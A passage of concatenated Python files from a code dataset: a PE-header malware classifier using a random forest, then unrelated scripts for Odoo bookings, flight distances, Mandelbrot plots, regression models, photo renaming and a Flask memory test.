scalling using z-score\nFeatures = Data_new.shape[1] # gets the number of important features after PCA\nIndex = np.argsort(FeatSelect.feature_importances_)[::-1][:Features] # Indexes the important features\ni = 1 # loop counter\nfor feat in range(Features): # loop in number of important features\n print(i,MalwareDataset.columns[2+Index[feat]]) # adds two becuase we deleted the first two features\n i = i+1 # loop increment\nfeature1 = MalwareDataset.columns[2+Index[0]]\nfeature2 = MalwareDataset.columns[2+Index[1]]\nplt.figure(figsize=(10,7))\nsns.scatterplot(x = feature1, y = feature2, s = 70, hue ='legitimate', data=MalwareDataset) # hue represents color\nLegit_Train, Legit_Test, Malware_Train, Malware_Test = train_test_split(Data, Target ,test_size=0.2) \n\n # Splits the data for training & testing \nclf = RandomForestClassifier(n_estimators=50) # builds multiple trees model using n_estimators\nclf.fit(Legit_Train, Malware_Train) # trains the model using on training dataset\nscore = clf.score(Legit_Test, Malware_Test) # gets the accuracy using test dataset \nprint(\"The score of Random Forest Algorithm is\", score*100) # multiplying by 100 to get the percentage\nResult = clf.predict(Legit_Test) # tests for geting the confusion matrix\nCM = confusion_matrix(Malware_Test, Result) # confusion matrix \nprint(\"False positive rate : %f %%\" % ((CM[0][1] / float(sum(CM[0])))*100))\nprint('False negative rate : %f %%' % ( (CM[1][0] /float(sum(CM[1]))*100)))\nplot_confusion_matrix(clf, Legit_Test, Malware_Test,cmap=plt.cm.Blues) # plots the confusion matrix \n\ndef get_entropy(data):\n if len(data) == 0:\n return 0.0\n occurences = array.array('L', [0]*256)\n print(occurences)\n for x in data:\n occurences[x if isinstance(x, int) else ord(x)] += 1\n\n entropy = 0\n for x in occurences:\n if x:\n p_x = float(x) / len(data)\n entropy -= p_x*math.log(p_x, 2)\n\n return entropy\n\ndef get_resources(pe):\n \"\"\"Extract resources :\n [entropy, size]\"\"\"\n resources = []\n if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):\n try:\n for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:\n if hasattr(resource_type, 'directory'):\n for resource_id in resource_type.directory.entries:\n if hasattr(resource_id, 'directory'):\n for resource_lang in resource_id.directory.entries:\n data = pe.get_data(resource_lang.data.struct.OffsetToData, resource_lang.data.struct.Size)\n size = resource_lang.data.struct.Size\n entropy = get_entropy(data)\n\n resources.append([entropy, size])\n except Exception as e:\n return resources\n return resources\n\ndef get_version_info(pe):\n \"\"\"Return version infos\"\"\"\n res = {}\n for fileinfo in pe.FileInfo:\n if fileinfo.Key == 'StringFileInfo':\n for st in fileinfo.StringTable:\n for entry in st.entries.items():\n res[entry[0]] = entry[1]\n if fileinfo.Key == 'VarFileInfo':\n for var in fileinfo.Var:\n res[var.entry.items()[0][0]] = var.entry.items()[0][1]\n if hasattr(pe, 'VS_FIXEDFILEINFO'): \n res['flags'] = pe.VS_FIXEDFILEINFO.FileFlags\n res['os'] = pe.VS_FIXEDFILEINFO.FileOS\n res['type'] = pe.VS_FIXEDFILEINFO.FileType\n res['file_version'] = pe.VS_FIXEDFILEINFO.FileVersionLS\n res['product_version'] = pe.VS_FIXEDFILEINFO.ProductVersionLS\n res['signature'] = pe.VS_FIXEDFILEINFO.Signature\n res['struct_version'] = pe.VS_FIXEDFILEINFO.StrucVersion\n return res\n\ndef extract_infos(fpath):\n res = []\n pe = pefile.PE(fpath)\n res.append(pe.FILE_HEADER.Machine) # Machine\n res.append(pe.FILE_HEADER.SizeOfOptionalHeader) # SizeOfOptionalHeader\n res.append(pe.FILE_HEADER.Characteristics) # Characteristics\n res.append(pe.OPTIONAL_HEADER.MajorLinkerVersion) # MajorLinkerVersion\n res.append(pe.OPTIONAL_HEADER.MinorLinkerVersion) # MinorLinkerVersion\n res.append(pe.OPTIONAL_HEADER.SizeOfCode) # SizeOfCode\n res.append(pe.OPTIONAL_HEADER.SizeOfInitializedData) # SizeOfInitializedData\n res.append(pe.OPTIONAL_HEADER.SizeOfUninitializedData) # SizeOfUninitializedData\n res.append(pe.OPTIONAL_HEADER.AddressOfEntryPoint) # AddressOfEntryPoint\n res.append(pe.OPTIONAL_HEADER.BaseOfCode) # BaseOfCode\n try:\n res.append(pe.OPTIONAL_HEADER.BaseOfData) # BaseOfData\n except AttributeError:\n res.append(0) \n res.append(pe.OPTIONAL_HEADER.ImageBase) # ImageBase\n res.append(pe.OPTIONAL_HEADER.SectionAlignment) # SectionAlignment\n res.append(pe.OPTIONAL_HEADER.FileAlignment) # FileAlignment\n res.append(pe.OPTIONAL_HEADER.MajorOperatingSystemVersion) # MajorOperatingSystemVersion\n res.append(pe.OPTIONAL_HEADER.MinorOperatingSystemVersion) # MinorOperatingSystemVersion\n res.append(pe.OPTIONAL_HEADER.MajorImageVersion) # MajorImageVersion\n res.append(pe.OPTIONAL_HEADER.MinorImageVersion) # MinorImageVersion\n res.append(pe.OPTIONAL_HEADER.MajorSubsystemVersion) # MajorSubsystemVersion\n res.append(pe.OPTIONAL_HEADER.MinorSubsystemVersion) # MinorSubsystemVersion\n res.append(pe.OPTIONAL_HEADER.SizeOfImage) # SizeOfImage\n res.append(pe.OPTIONAL_HEADER.SizeOfHeaders) # SizeOfHeaders\n res.append(pe.OPTIONAL_HEADER.CheckSum) # CheckSum\n res.append(pe.OPTIONAL_HEADER.Subsystem) # Subsystem\n res.append(pe.OPTIONAL_HEADER.DllCharacteristics) # DllCharacteristics\n res.append(pe.OPTIONAL_HEADER.SizeOfStackReserve) # SizeOfStackReserve\n res.append(pe.OPTIONAL_HEADER.SizeOfStackCommit) # SizeOfStackCommit\n res.append(pe.OPTIONAL_HEADER.SizeOfHeapReserve) # SizeOfHeapReserve\n res.append(pe.OPTIONAL_HEADER.SizeOfHeapCommit) # SizeOfHeapCommit\n res.append(pe.OPTIONAL_HEADER.LoaderFlags) # LoaderFlags\n res.append(pe.OPTIONAL_HEADER.NumberOfRvaAndSizes) # NumberOfRvaAndSizes\n res.append(len(pe.sections)) \n entropy = list(map(lambda x:x.get_entropy(), pe.sections)) # SectionsNb\n res.append(sum(entropy)/float(len(entropy))) # SectionsMeanEntropy\n res.append(min(entropy)) # SectionsMinEntropy\n res.append(max(entropy)) # SectionsMaxEntropy\n raw_sizes = list(map(lambda x:x.SizeOfRawData, pe.sections))\n res.append(sum(raw_sizes)/float(len(raw_sizes))) # SectionsMeanRawsize\n res.append(min(raw_sizes)) # SectionsMinRawsize\n res.append(max(raw_sizes)) # SectionMaxRawsize\n virtual_sizes = list(map(lambda x:x.Misc_VirtualSize, pe.sections))\n res.append(sum(virtual_sizes)/float(len(virtual_sizes))) # SectionsMeanVirtualsize\n res.append(min(virtual_sizes)) # SectionsMinVirtualsize\n res.append(max(virtual_sizes)) # SectionMaxVirtualsize\n\n #Imports\n try:\n res.append(len(pe.DIRECTORY_ENTRY_IMPORT)) # ImportsNbDLL\n imports = list(sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])) \n res.append(len(imports)) # ImportsNb \n res.append(len(list(map(lambda x:x.name is None, imports)))) # ImportsNbOrdinal\n except AttributeError:\n res.append(0)\n res.append(0)\n res.append(0)\n\n #Exports\n try:\n res.append(len(pe.DIRECTORY_ENTRY_EXPORT.symbols)) # ExportNb\n except AttributeError:\n # No export\n res.append(0)\n \n resources= get_resources(pe) #Resources\n res.append(len(resources)) # ResourcesNb\n if len(resources)> 0:\n entropy = list(map(lambda x:x[0], resources))\n res.append(sum(entropy)/float(len(entropy))) # ResourcesMeanSize\n res.append(min(entropy)) # ResourcesMinEntropy\n res.append(max(entropy)) # ResourcesMaxEntropy\n sizes = list(map(lambda x:x[1], resources))\n res.append(sum(sizes)/float(len(sizes))) # ResourcesMeanSize\n res.append(min(sizes)) # ResourcesMinSize\n res.append(max(sizes)) # ResourcesMaxSize\n else:\n res.append(0)\n res.append(0)\n res.append(0)\n res.append(0)\n res.append(0)\n res.append(0)\n # Load configuration size\n try:\n res.append(pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size) # LoadConfigurationSize\n except AttributeError:\n res.append(0)\n # Version configuration size\n try:\n version_infos = get_version_info(pe)\n res.append(len(version_infos.keys())) # VersionInformationSize\n except AttributeError:\n res.append(0)\n return res\nfpath = \"wildfire-test-pe-file.exe\" # file path to predict if file is malware\nfile_extract = extract_infos(fpath) # takes in the file features and saves the list variable\narr = np.array(file_extract) # converts the list to numpy array\narr = arr.reshape(1, 54) # changes the 1D array to 2D array for prediction\nprint(arr) # prints the array\nResult = clf.predict(arr) # Predicts by entering the argument as a numpy array\nResult\nif Result==0: \n print(\"The file sample is malware\") # prints if file is malware\nelse:\n print(\"The file sample is not malware\") # prints if file is not malware","repo_name":"bbailey17/Malware-Detection-Using-Python","sub_path":"malwaredetection.py","file_name":"malwaredetection.py","file_ext":"py","file_size_in_byte":13524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35021518184","text":"\nfrom dateutil.relativedelta import relativedelta\n\nfrom odoo import fields, models, api\n\n\nclass Booking(models.Model):\n _name = \"travels.management.booking\"\n _description = \"travels management booking\"\n\n def _compute_expiration_date(self):\n print(self)\n for rec in self:\n rec.expiration_date = rec.booking_date + relativedelta(\n days=int(rec.services_id.expiration_period))\n if rec.expiration_date < fields.Date.today():\n rec.write({'state': 'expired'})\n\n def button_confirmed(self):\n # print(self.customer_id.name)\n self.write({'state': 'confirmed'})\n\n def button_reset(self):\n self.write({'state': 'draft'})\n\n def button_cancel(self):\n self.write({'state': 'cancelled'})\n\n name = fields.Char(string=\"Booking Reference\", readonly=True, required=True,\n copy=False, default='New')\n customer_id = fields.Many2one(\"res.partner\", string=\"Customer\", copy=False)\n\n no_of_passengers = fields.Integer(string=\"No of Passengers\", default='1')\n\n # service = fields.Selection(\n # string='Service',\n # selection=[('flight', 'Flight'), ('train', 'Train'), ('bus', 'Bus')],\n # help=\"service is used to separate Flight,Train and Bus\")\n services_id = fields.Many2one(\"travels.management.service.types\",\n required=True)\n booking_date = fields.Date(default=fields.Date.context_today)\n source_location_id = fields.Many2one(\"travels.management.location\")\n destination_location_id = fields.Many2one(\"travels.management.location\")\n\n travel_date = fields.Datetime()\n expiration_date = fields.Date(compute=_compute_expiration_date)\n # current_date = fields.Date(default=fields.Date.context_today)\n\n state = fields.Selection([\n ('draft', 'Draft'),\n ('confirmed', 'Confirmed'),\n ('cancelled', 'Cancelled'),\n ('expired', 'Expired'),\n ], default=\"draft\")\n\n @api.model\n def create(self, vals):\n if vals.get('name', 'New') == 'New':\n vals['name'] = self.env['ir.sequence'].next_by_code(\n 'booking') or 'New'\n result = super(Booking, self).create(vals)\n return result\n","repo_name":"Aswani2022/MyProject","sub_path":"travels_management/models/travels_management_booking.py","file_name":"travels_management_booking.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11850266888","text":"# Dylan Thiemann\n# Daily programming\n# https://www.reddit.com/r/dailyprogrammer/comments/8i5zc3/20180509_challenge_360_intermediate_find_the/?utm_content=title&utm_medium=hot&utm_source=reddit&utm_name=dailyprogrammer\n\n# Callsign index = 1\n# Longitude index = 5\n# latitude index = 6\n\nimport requests, json, math, sys\n\ndef main(longitude, latitude):\n openSkyApiUrl = \"https://opensky-network.org/api/states/all\"\n response = requests.get(openSkyApiUrl)\n flight_data = response.json()\n\n shortestDistance = sys.float_info.max\n closestFlight = \"\"\n\n startPoint = (latitude, longitude)\n for flight in flight_data[\"states\"]:\n if (flight[5] == None or flight[6] == None):\n continue\n \n distance = euclideanDistance(startPoint, (flight[6], flight[5]))\n if (distance < shortestDistance):\n shortestDistance = distance\n closestFlight = flight\n\n print(closestFlight, shortestDistance)\n\n# startPoint = (lat, long), endPoint = (lat, long)\ndef euclideanDistance(startPoint, endPoint):\n return math.sqrt((endPoint[0] - startPoint[0])**2 + (endPoint[1] - startPoint[1])**2)\n\nmain(-2.2945, 48.8584)","repo_name":"dthiemann/DailyProgrammer","sub_path":"fromReddit/5-9-18.py","file_name":"5-9-18.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16488663565","text":"#!/bin/sh\n\nimport numpy as np\nfrom timeit import default_timer as timer\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\"\"\" Funksjonen tar inn verdiene xmin, xmax, ymin, ymax som setter verdien\n til omraadet vi oensker aa undersoeke. Det sendes ogsaa med en bredde-\n hoyde variabel som bestemmer bildets form/opploesning. Funksjonen danner\n et array c med komplekse tall for alle verdier width * height og en maske\n for aa sjekke hvilke punkter som har konvergert. Saa gaar den opp til\n maxiter og bruker numpy-array operasjoner for aa oppdatere n3 basert paa om\n punktene har konvergert eller ikke. Masken gjoer at kun punkter som ikke\n har konvergert faar utfoert z^2 + c -operasjonen.\n\n Returnerer -> To-dimensjonellt array n3 som inneholder escape values\n for alle piksler\n\"\"\"\ndef mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter):\n\n r1 = np.linspace(xmin, xmax, width)\n r2 = np.linspace(ymin, ymax, height)\n n3 = np.zeros((height, width))\n\n r2_vert = r2.reshape(height,1)\n\n #Arrayet r1 staar for de reelle delene av de komplekse tallene, og\n #r2 staar for de imaginere delene. Vi oensker fra disse aa konstruere\n #ett to-dimensjonellt array med komplekse tall som har sin venstreside\n #(reell del) av delene i r1 mot r2 (imaginer del). Vi har et reshapet\n #vertikalt r2 og kan derfor med foelgende linje konstruere et nytt array\n #\"c\" i 2D som vil inneholde alle de komplekse tallene vi skal bruke.\n c = r1 + 1j * r2_vert\n\n #Boolean mask for aa unnga overflow ved sjekk paa plasser som\n #Allerede har konvergert\n mask = np.ones((height, width), dtype=np.bool_)\n\n #Vi danner et 2D array med komplekse tall. I foerste iterasjon er dette\n #arrayet kun bestaende av null og blir derfor satt til aa inneholde det\n #Samme som c inne i loekken. Deretter vil det inneholde produktet av\n #seg selv gange seg selv pluss c respektivt til alle plasser, z*z + c\n z = np.zeros((height, width), dtype=np.complex64)\n for n in range(maxiter):\n\n #Paa n3 = n3 + (abs(z) < 2.0) er det som skjer at alle posisjoner der\n #absoluttverdien av z er stoerre enn 2 itereres med en, og de som er\n #i mandelbrot gaar derfor opp mot maxiter stoerrelse. Vi bruker mask\n #for aa unngaa overflow error. Mask oppdateres etter hver iterasjon\n #for aa sjekke hva som har konvergert\n z[mask] = z[mask]*z[mask] + c[mask]\n n3 = n3 + (abs(z) < 2.0)\n mask = (abs(z) < 2.0)\n\n return (n3)\n\ndef mandelbrot_image(xmin,xmax,ymin,ymax,width,height,maxiter,fname,color_choice):\n\n print()\n print(\"-- Timing 3 runs ---\")\n\n start1 = timer()\n z1 = mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter)\n stop1 = timer()\n\n start2 = timer()\n z2 = mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter)\n stop2 = timer()\n\n start3 = timer()\n z3 = mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter)\n stop3 = timer()\n\n print()\n print(\"Results:\")\n print(stop1 - start1)\n print(stop2 - start2)\n print(stop3 - start3)\n print()\n\n #Med denne sammenstillingen i \"colors\" saa vil alltid de fargene (CHOICE = 1) som har\n #\"maxiter\" verdi tilegnes fargen svart gitt av (0, 0, 0), og de andre\n #fargene vil farges etter hvilken maxiter verdi de fikk naar de konvergerte,\n #dvs deres verdi fra 1 til maxiter. Dette fungerer fordi vaart 2D array\n #som returneres inneholder alle maxiter verdiene for konvergering.\n if(fname != None):\n if(color_choice == \"1\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.savefig(fname)\n plt.show()\n if(color_choice == \"2\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 1, 1), (1, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.savefig(fname)\n plt.show()\n if(color_choice == \"3\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.savefig(fname)\n plt.show()\n else:\n if(color_choice == \"1\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.show()\n if(color_choice == \"2\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 1, 1), (1, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.show()\n if(color_choice == \"3\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.show()\n\n\nmandelbrot_image(-2.0,0.5,-1.25,1.25,500,500,50)\n","repo_name":"PeterKon/Skoleprosjekter","sub_path":"MandelbrotGenerator/mandelbrot_2.py","file_name":"mandelbrot_2.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41203934339","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import MinMaxScaler\nfrom models.LinearRegression import LinearRegression\nfrom models.KnnRegression import KnnRegression\nfrom models.DecisionTreeRegression import DecisionTreeRegression\nfrom models.RandomForestRegression import RandomForestRegression\n\nnp.random.seed(428)\ndata = []\n\ndef load_data():\n\tglobal data\n\t#menu id dictionary data (structure: {menu_id[idx]: [1,2,3]})\n\tmenu_id = dict()\n\tmenu_buff = pd.read_excel('./data/menu.xlsx')\n\tdf = pd.DataFrame(menu_buff)\n\n\tfor idx, row in df.iterrows():\n\t\tmenu_id[int(row['FoodId'])] = [row['재료'],row['조리'],row['메뉴']]\n\n\t#food supply/left data in np.array\n\tdata = pd.read_csv('./data/final_data.csv',na_values = {'food_supply':[],'food_left':[]},sep=',')\n\tdf = pd.DataFrame(data)\n\n\t#drop out null data\n\txy = np.array(df.dropna(), dtype=np.int32)\n\tx = xy[:,1:4]\n\ty = xy[:,4]\n\n\t#transform [date, foodId] -> categorical data\n\ttemp=[]\n\tfor i in range(len(x)):\n\t\ttemp.append([x[i][0]]+menu_id[x[i][1]])\n\ttemp = np.array(temp)\n\n\tnumeric = np.hstack((x[:,2].reshape(-1,1),xy[:,-2:]))\n\n\t# scaling (0,1)\n\tscaler = MinMaxScaler()\n\tnumeric = scaler.fit_transform(numeric)\n\n\t#One-Hot encoding categorical data\n\tone_hot_e = OneHotEncoder().fit_transform(temp).toarray()\n\tx = np.hstack((one_hot_e, numeric))\n\t#x = np.hstack((one_hot_e, x[:,2].reshape(-1,1)))\n\tdata = np.hstack((x, y.reshape(-1, 1)))\n\n# split train set / test set\ndef split_data(test_ratio):\n\tif len(data)==0: load_data()\n\n\tnp.random.shuffle(data)\n\ttest_size = int(len(data)*test_ratio)\n\ttest_x = data[:test_size, :-1]\n\ttest_y = data[:test_size, -1]\n\ttrain_x = data[test_size:, :-1]\n\ttrain_y = data[test_size:, -1]\n\n\treturn test_x, test_y, train_x, train_y\n\ndef initialize(test_ratio, model_name):\n\ttest_x, test_y, train_x, train_y = split_data(test_ratio)\n\tmodel = None\n\n\tif model_name == 'LinearRegression':\n\t\tmodel = LinearRegression()\n\telif model_name == 'KnnRegression':\n\t\ttest_x = np.hstack((test_x[:, :-3], test_x[:, -3:]))\n\t\ttrain_x = np.hstack((train_x[:, :-3], train_x[:, -3:]))\n\t\tmodel = KnnRegression()\n\telif model_name == 'DecisionTreeRegression':\n\t\tmodel = DecisionTreeRegression()\n\telif model_name == 'RandomForestRegression':\n\t\tmodel = RandomForestRegression()\n\telse:\n\t\traise NotImplementedError\n\n\treturn (test_x, test_y), (train_x, train_y), model","repo_name":"yds9744/ML-predict-leftover","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23181682244","text":"\"\"\"\nThis file renumbers photos in a folder to integer numbers starting at 0001.\n\"\"\"\n\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\n\ndef first_num(filename: Path):\n \"\"\"\n Get a number to sort filenames based on.\n If there are spaces, it is clearly not a numeric file name.\n If the first character in the name is not a digit, then it is not a number.\n If the first character is a number then sort based on that.\n \"\"\"\n\n filename = filename.name\n\n filename = filename.split(\" \")\n\n if len(filename) == 1:\n return 0\n\n if not filename[0].isdigit():\n return 0\n\n return int(filename[0])\n\n\ndef rename_photos():\n \"\"\"\n This file renumbers photos in a folder to integer numbers starting at 0001.\n \"\"\"\n\n true_dict = {\"n\": False, \"no\": False, \"y\": True, \"yes\": True}\n\n print()\n print(\"This will rename the files, and cannot be reversed.\")\n\n while True:\n keep_going = input(\"Do you wish to continue (y or n)? \")\n\n keep_going = keep_going.lower()\n\n if keep_going in true_dict:\n keep_going = true_dict[keep_going]\n break\n\n if not keep_going:\n return\n\n print()\n base_path = Path(input(\"Provide the base path: \"))\n\n if base_path.is_dir():\n recursive: bool = None\n print()\n while recursive is None:\n recursive = input(\"Do you want to search subfolders (Y or N)? \")\n\n recursive = true_dict.get(recursive.lower())\n\n file_types = [\".jpg\", \".png\", \".bmp\", \".jpeg\"]\n\n # now we've got input, now do the actual finding of files\n\n directories = set()\n\n if recursive:\n # if subfolders are required, use rglob\n\n print()\n print(\"Finding Sub-folders by Parsing Links\")\n\n print()\n\n filter_val = \"*\"\n\n d_list = [\n f\n for f in tqdm(\n base_path.rglob(filter_val), desc=\"Parsing links\", unit=\"Links\"\n )\n if f.is_dir()\n ]\n\n for directory in d_list:\n directories.add(directory)\n\n else:\n # if only the local folder, just use iterdir\n\n directories.add(base_path)\n\n print()\n\n changed = 0\n\n warnings = []\n\n for folder in tqdm(\n sorted(directories), desc=\"Searching for Photos\", unit=\"Files\"\n ):\n counter = 1\n\n folder: Path\n\n # now go through the files / photos etc.\n for photo in tqdm(\n sorted(folder.iterdir(), key=first_num),\n desc=\"Renaming Photos\",\n unit=\"Photos\",\n ):\n photo: Path\n\n if photo.is_dir():\n continue\n\n if photo.suffix.lower() in file_types:\n # now we need to rename\n new_path = photo.parent / Path(f\"{counter:04d}\").with_suffix(\n photo.suffix\n )\n\n if new_path.exists():\n warning_string = \"ERROR\\n\"\n warning_string += (\n f\"Tried replacing: \\n {folder}\\n\"\n + f\"with\\n {new_path}\\n\"\n )\n warning_string += \"But new path already exists\\n\"\n warning_string += \"-\" * 40\n warning_string += \"\\n\"\n\n warnings += [warning_string]\n\n continue\n\n photo.rename(new_path)\n changed += 1\n\n counter += 1\n\n print()\n print(f\"Updated {changed} files\")\n\n else:\n print(\"The provided path is not a directory.\")\n\n print()\n input(\"Press any key to exit.\")\n\n\nif __name__ == \"__main__\":\n rename_photos()\n","repo_name":"skane88/utilityscripts","sub_path":"utilityscripts/photo_renamer.py","file_name":"photo_renamer.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42185792405","text":"## Required Libraries\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score\n\n## Import data and get X and Y variables (Independant and Dependant Respectively)\ncompanies = pd.read_csv(r'C:\\Users\\kayde\\source\\repos\\MachineLearningAlgos\\LinearRegression\\1000_Companies.csv')\n\nX = companies.iloc[:, :-1].values\nY = companies.iloc[:, 4].values\n\n## Print all data\nprint(companies.head())\n## Print independant data\nprint(X)\n## Print dependant data\nprint(Y)\n\n## Builds correlation matrix : 1 = more correlation 0 = less\nplt.figure(figsize=(10, 7))\n## Only include columns with numbers bc of error\nnumeric_companies = companies.select_dtypes(include=[np.number])\nsns.heatmap(numeric_companies.corr(), annot=True, cmap=\"coolwarm\")\nplt.show()\n\n## Encode the categorical data\ncolumn_transformer = ColumnTransformer(\n transformers=[\n (\"encoder\", OneHotEncoder(drop='first'), [3]) # We're using drop='first' to avoid the dummy variable trap\n ],\n remainder='passthrough'\n)\n\nX = column_transformer.fit_transform(X)\nX = X[:, 1:] ## Removes dummy data\n\n## Create the train/test split\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n## Initialize the model\nregressor = LinearRegression()\n\n## Fit with the training data\nregressor.fit(X_train, y_train)\n\n## Predict Results\ny_pred = regressor.predict(X_test)\nprint(y_pred)\n\n## Prints the coefficient\nprint(regressor.coef_)\n\n## Prints the Y intercept\nprint(regressor.intercept_)\n\n## Evaluate the model\nprint(r2_score(y_test, y_pred))\n\n## Closer to 1 = better model, this model has a r2 score of .91 so it is accurate\n","repo_name":"kaydenfriese/Machine-Learning-Algorithms","sub_path":"LinearRegression/LinearReg.py","file_name":"LinearReg.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30132297928","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\n\n\"\"\" Параметры танцевальных стилей\n\"\"\"\nDANCE_CONFIG = {\n 'Hip-hop': {\n 'body': 'покачивает телом вперёд и назад',\n 'head': 'головой вперёд-назад',\n 'legs': 'ноги в полу-присяде',\n 'hands': 'руки согнуты в локтях',\n },\n 'Electrohouse': {\n 'body': 'покачивает туловищем вперёд-назад',\n 'head': 'почти не двигает головой',\n 'legs': 'двигает ногами в ритме',\n 'hands': 'вращает руками по кругу',\n },\n 'Pop': {\n 'body': 'плавно двигает туловищем',\n 'head': 'плавно двигает туловищем головой',\n 'legs': 'плавно двигает руками',\n 'hands': 'плавно двигает ногами',\n },\n}\n\n\"\"\" Параметры музыкальных стилей\n\"\"\"\nSTYLE_CONFIG = {\n 'RnB': [\n 'Hip-hop', 'RnB',\n ],\n 'Electrohouse': [\n 'Electrodance', 'House', 'Electrohouse',\n ],\n 'Pop': [\n 'Pop',\n ]\n}\n\n\n\"\"\" Параметры танцоров (возможные имена)\n\"\"\"\nNAMES_MALE = [\n 'Вася', 'Витя', 'Никита', 'Саша', 'Петя', 'Ваня', 'Олег', 'Дима',\n]\n\nNAMES_FEMALE = [\n 'Оля', 'Надя', 'Вера', 'Люба', 'Женя', 'Лена', 'Маша', 'Евлампия',\n]\n\nFEMALE, MALE = range(0, 2)\nNAMES = {\n FEMALE: NAMES_FEMALE, MALE: NAMES_MALE\n}\n","repo_name":"Tkretts/night_club","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21680605573","text":"from __future__ import with_statement\n\nimport gc\nimport sys\nimport flask\nimport threading\nimport unittest\nfrom werkzeug.test import run_wsgi_app, create_environ\nfrom flask.testsuite import FlaskTestCase\n\n\n_gc_lock = threading.Lock()\n\n\nclass _NoLeakAsserter(object):\n\n def __init__(self, testcase):\n self.testcase = testcase\n\n def __enter__(self):\n gc.disable()\n _gc_lock.acquire()\n loc = flask._request_ctx_stack._local\n\n # Force Python to track this dictionary at all times.\n # This is necessary since Python only starts tracking\n # dicts if they contain mutable objects. It's a horrible,\n # horrible hack but makes this kinda testable.\n loc.__storage__['FOOO'] = [1, 2, 3]\n\n gc.collect()\n self.old_objects = len(gc.get_objects())\n\n def __exit__(self, exc_type, exc_value, tb):\n if not hasattr(sys, 'getrefcount'):\n gc.collect()\n new_objects = len(gc.get_objects())\n if new_objects > self.old_objects:\n self.testcase.fail('Example code leaked')\n _gc_lock.release()\n gc.enable()\n\n\nclass MemoryTestCase(FlaskTestCase):\n\n def assert_no_leak(self):\n return _NoLeakAsserter(self)\n\n def test_memory_consumption(self):\n app = flask.Flask(__name__)\n @app.route('/')\n def index():\n return flask.render_template('simple_template.html', whiskey=42)\n\n def fire():\n with app.test_client() as c:\n rv = c.get('/')\n self.assert_equal(rv.status_code, 200)\n self.assert_equal(rv.data, '

    42

